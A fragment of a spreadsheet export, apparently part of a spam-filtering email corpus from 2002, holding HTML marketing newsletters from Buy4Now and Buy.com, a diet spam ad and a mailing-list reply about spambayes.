 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backDivider&amp;#4=
 6;gif" width=3D"558" height=3D"1"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#FFFFFF"&gt;=20
               &lt;table width=3D"558" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                   &lt;td valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;font face=3D"Arial,Helvetica,Sans-Serif" =
 size=3D"1" color=3D"#330066"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/backHeaderNeed=
 Help&amp;#46;gif" width=3D"107" height=3D"25"&gt;&lt;br&gt;
                       &lt;font size=3D"2" color=3D"#FFFFFF" face=3D"Arial, =
 Helvetica, sans-serif"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#330066"&gt;Contact=20
                       Buy4Now on &lt;b&gt;1890 209 309 &lt;/b&gt;(&lt;i&gt;calls charged =
 at a local=20
                       rate&amp;#46; Lines open Mon-Fri 9am-9pm, Sat =
 9am-6pm)&lt;/i&gt; or email=20
                       us&lt;/font&gt;&lt;font color=3D"#330066"&gt; at &lt;a =
 href=3D"mailto:help@buy4now&amp;#46;ie"&gt;help@buy4now&amp;#46;ie&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;=
 =20
                       &lt;br&gt;
                       &lt;br&gt;
                       We're sending this newsletter to you as a =
 registered member=20
                       of Buy4Now&amp;#46; If you would like to change the =
 format you receive=20
                       this newsletter in, &lt;a
  =
 href=3D"mailto:newslettercomments@buy4now&amp;#46;ie?subject=3DPlease%20send%=
 20me%20this%20newsletter%20in%20TEXT%20format&amp;#46;"&gt;click=20
                       here&lt;/a&gt;&amp;#46; If you no longer want to receive the =
 Buy4Now Nnewsletter,=20
                       simply &lt;a
  =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/emails/unsubscribe&amp;#46;asp?email=3D=
 zzz-buy4now@zzzason&amp;#46;org&amp;g=3D5"&gt;click=20
                       here&lt;/a&gt;&amp;#46; &lt;/font&gt;&lt;font =
 face=3DArial,Helvetica,Sans-Serif size=3D1&gt;&lt;font color=3D"#330066"&gt;&lt;br&gt;
                       &lt;br&gt;
                       Buy4Now&amp;#46;ie is registered and operates under EU =
 data protection=20
                       legislation&amp;#46; For more information and to view =
 our privacy=20
                       policy, &lt;a
  href=3D"http://www&amp;#46;buy4now&amp;#46;ie/register/datainfo&amp;#46;htm"&gt;click =
 here&lt;/a&gt;&amp;#46; If you have=20
                       any comments please drop us an email, simply &lt;a
  href=3D"mailto:newslettercomments@buy4now&amp;#46;ie"&gt;click here&lt;/a&gt;&amp;#46; =
 &lt;/font&gt; &lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;td&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"10" height=3D"10"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;p&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/tracker0802&amp;#4=
 6;gif" width=3D"1" height=3D"1"&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
       &lt;td bgcolor=3D"#660099"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr bgcolor=3D"#660099"&gt;=20
       &lt;td colspan=3D"3"&gt;&lt;img =
 src=3D"http://www&amp;#46;buy4now&amp;#46;ie/mailshot/email/images/spacer&amp;#46;gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&lt;/p&gt;
   &lt;p&gt;=20
     &lt;map name=3D"Map"&gt;=20
       &lt;area shape=3D"rect" coords=3D"0,2,121,29" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D2&amp;ss=3D0&amp;sc=3DM" =
 target=3D"_blank"&gt;
       &lt;area shape=3D"rect" coords=3D"149,1,198,17" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D1&amp;sc=3DF" =
 target=3D"_blank"&gt;
       &lt;area shape=3D"rect" coords=3D"224,3,318,26" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D6&amp;sc=3DG" =
 target=3D"_blank"&gt;
     &lt;/map&gt;
   &lt;/p&gt;
   &lt;/div&gt;
 &lt;map name=3D"Map2"&gt;=20
   &lt;area shape=3D"rect" coords=3D"16,23,172,46" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D0&amp;sc=3DH#t=
 rackorder" target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"16,44,176,67" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D0&amp;sc=3DH#e=
 ditpassword" target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"17,67,180,86" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D0&amp;sc=3DH#p=
 ayorder" target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"16,88,201,106" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D0&amp;sc=3DH#p=
 assword" target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"17,106,200,128" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D1&amp;ss=3D0&amp;sc=3DH#d=
 elcharge" target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;map name=3D"Map4"&gt;=20
   &lt;area shape=3D"rect" coords=3D"9,3,125,25" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D3&amp;ss=3D0&amp;sc=3D" =
 target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"159,3,272,26" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D8&amp;ss=3D0&amp;sc=3D" =
 target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"292,3,366,27" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D5&amp;ss=3D0&amp;sc=3D" =
 target=3D"_blank"&gt;
   &lt;area shape=3D"rect" coords=3D"391,2,433,26" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D10&amp;ss=3D0&amp;sc=3D"&gt;=
   &lt;area shape=3D"rect" coords=3D"446,2,522,28" =
 href=3D"http://www&amp;#46;buy4now&amp;#46;ie/index&amp;#46;asp?s=3D11&amp;ss=3D0&amp;sc=3D" =
 target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_22A2C_01C23F09.09760420--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: *Do Your Butt, Hips And Thighs Embarrass You?*
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table align="center" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td align="center"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=NFYNEAOKPTPK&amp;ext=1"&gt;&lt;img src="http://admanmail.com/ads/adman/trim_life/creative--002.gif" width="450" height="300" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=NFYNEAOKPTPK"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</si>
  <si>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
     &gt;&gt; Ultimately I'd like to see tight integration into the "most popular
     &gt;&gt; email clients"..
 The advantage of using a kitchen sink (umm, make that highly programmable)
 editor+email package like Emacs+VM is that you can twiddle your key bindings
 and write a little ELisp (or Pymacs) glue to toss messages in the right
 direction (spam or ham).  For this, spambayes would have to operate in an
 incremental fashion when fed a single ham or spam message.
 (No, I have no idea what an "auto-ham" is.  A pig run over by a car,
 perhaps?)
 give-a-dog-a-bone-ly, y'rs,
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Buyers Alert Announce&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr valign="bottom"&gt;&lt;td width="440"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/hd_buyers_alert.gif" width="440" height="60" alt="ZDNet Announce"&gt;&lt;/td&gt;
 &lt;td width="184"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/corner_anc.gif" width="184" height="8"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr bgcolor="#ffffef"&gt;&lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="600" height="32" align="center"&gt;&lt;font face="arial, helvetica" size="-1" color="#333333"&gt;&lt;b&gt;* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#ffffff"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width="600"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 15, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;&lt;title&gt;Free Shipping at Buy.com!*&lt;/title&gt;&lt;/head&gt;
 &lt;body&gt;
 &lt;table width="600" cellspacing="0" cellpadding="0" border="1" bordercolor="175A7E"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td height="75" valign="top" align="left" bgcolor="#ffffff"&gt;
 						&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNET_062402/FS_nominimum_hdr.gif" width="598" height="75" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" bgcolor="#ffffff" cellspacing="0" cellpadding="20" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td height="147" width="555" valign="top" align="middle" bgcolor="#ffffff"&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89Mj6W-aktQ3DlPfP8N4R" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNET_062402/FS_truck.gif" width="555" height="147" border="0" alt="Visit Buy.com Today For Free Shipping!*"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td colspan="2" width="100%"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/feat_prod_blue.gif" width="553" height="24" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td valign="top" width="50%"&gt;
 						&lt;table cellspacing="10" cellpadding="0" border="0"&gt;
 							&lt;tr&gt;
 								&lt;td align="center" valign="top"&gt;
 									&lt;img src="http://ak.buy.com/db_assets/ad_images/998/20345998.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;pcAnywhere 10.5&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$179.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$159.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Plus an $80.00 mail-in upgrade rebate available from Symantec.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW8Sk_eL9Z5VKc-3P0BcR"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src="http://ak.buy.com/db_assets/ad_images/367/10259367.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Linksys 11Mbps&lt;br&gt;Wireless PC Card&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$69.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Share printers, files and more anywhere within your wireless LAN infrastructure; increasing your productivity and keeping you "in touch."&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHO_le9wDYjKHbtbXYzHRR"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src="http://ak.buy.com/db_assets/ad_images/605/10310605.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;MouseMan Traveler Optical Mouse for Notebooks&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$49.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$43.12&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Travel anywhere with it. No ball. No cleaning. No hassle.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DeKfDiQA5K-fxuEL59R"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src="http://ak.buy.com/db_assets/ad_images/231/90105231.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Panasonic DVD-LV50 PalmTheater? Portable DVD-Video Player with Built-in Freestyle LCD&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$599.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$499.99&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Panasonic's portable DVD players are equipped with built-in widescreen LCD monitors.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71Z-b870tuoAABMMPZ9rR" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/blu_triangle.gif" border="0" valign="absmiddle"&gt;&lt;font face="verdana,arial,helvetica,sans-serif" size="1" color="175A7E"&gt;&lt;b&gt;more info&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;p&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td valign="top" width="50%"&gt;
 						&lt;table cellspacing="10" cellpadding="0" border="0"&gt;
 							&lt;tr&gt;
 								&lt;td align="center" valign="top"&gt;
 									&lt;img src="http://ak.buy.com/db_assets/ad_images/245/10321245.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Acer TM632XCI NB P4&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$2,077.19&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$2,031.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Mobile experience to the next Level! Amazing value on this Acer Notebook!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68MIqRrCW5CH7esbKRiR"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src="http://ak.buy.com/db_assets/ad_images/851/10308851.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;128MB SanDisk&lt;br&gt;SmartMedia Card&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$108.75&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$55.58&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Removable SmartMedia Card that's great for the Road!&lt;br&gt;Plus Free Shipping!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIc0NBiQhaIHsSzky0PR"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src="http://ak.buy.com/db_assets/ad_images/924/70006924.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;US Robotics 56K Global GSM &amp; Cellular PC Card Modem&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$119.99&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$69.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Get connected on your notebook anywhere your GSM Cell phone works!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRU6Po4ygVnxXFZcIuInR" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/blu_triangle.gif" border="0" valign="absmiddle"&gt;&lt;font face="verdana,arial,helvetica,sans-serif" size="1" color="175A7E"&gt;&lt;b&gt;more info&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;p&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td align="center" valign="top"&gt;
 									&lt;img src="http://ak.buy.com/db_assets/ad_images/239/10322239.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Toshiba PocketPC e310&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$402.84&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$359.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Easy to use, the Toshiba Pocket PC e310 features a familiar user interface and tools powered by Microsoft Windows such as Pocket Word, Excel, Outlook &amp; Windows Media Player for Pocket PC 2002.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMz2gIzdmkSWreAgRDciR" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/blu_triangle.gif" border="0" valign="absmiddle"&gt;&lt;font face="verdana,arial,helvetica,sans-serif" size="1" color="175A7E"&gt;&lt;b&gt;more info&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;p&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/terms_blu.gif" align="left" width="590" height="19" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="10" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
 						&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="1" color="000000"&gt;
 						All prices and product availability subject to change without notice. Unless 
 						noted, prices do not include shipping and applicable sales taxes. Product 
 						quantities limited. List price refers to manufacturer's suggested retail 
 						price and may be different than actual selling prices in your area. Please 
 						visit us at &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkhDZaFxv3orMjEsaQPR" target="_new"&gt;www.buy.com&lt;/a&gt; or the 
 						links above for more information including latest pricing, availability and 
 						restrictions on each offer. "Buy.com" and "The Internet Superstore" are trademarks of 
 						BUY.COM Inc. (C) BUY.COM Inc. 2002. All rights reserved. 
 						&lt;p&gt;*FREE SHIPPING OFFER: Get FREE SHIPPING on qualified items for a limited 
 						time only. Qualified items are identified on product information pages with 
 						this free shipping icon. Standard ground shipping method will be selected by 
 						Buy.com except for books, videos, DVDs, music and games, which will ship 
 						via budget shipping method. Free shipping offer is limited to in stock 
 						items. Restrictions apply. See site for details.&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer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width="624"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href='http://clickthru.online.com/Click?q=02-qif9zej4NJqw18ztcG9OQQmdb4m0ARRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.zdnet.com/filters/email/faq/"&gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/a&gt;&lt;br&gt;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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://www.zdnet.com/"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://www.zdnet.com/techupdate/filters/main/" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020441,00.html" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020424,00.html" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020442,00.html" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020443,00.html" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020445,00.html" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020444,00.html" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020568,00.html" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;tr:ad name="copyright" /&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
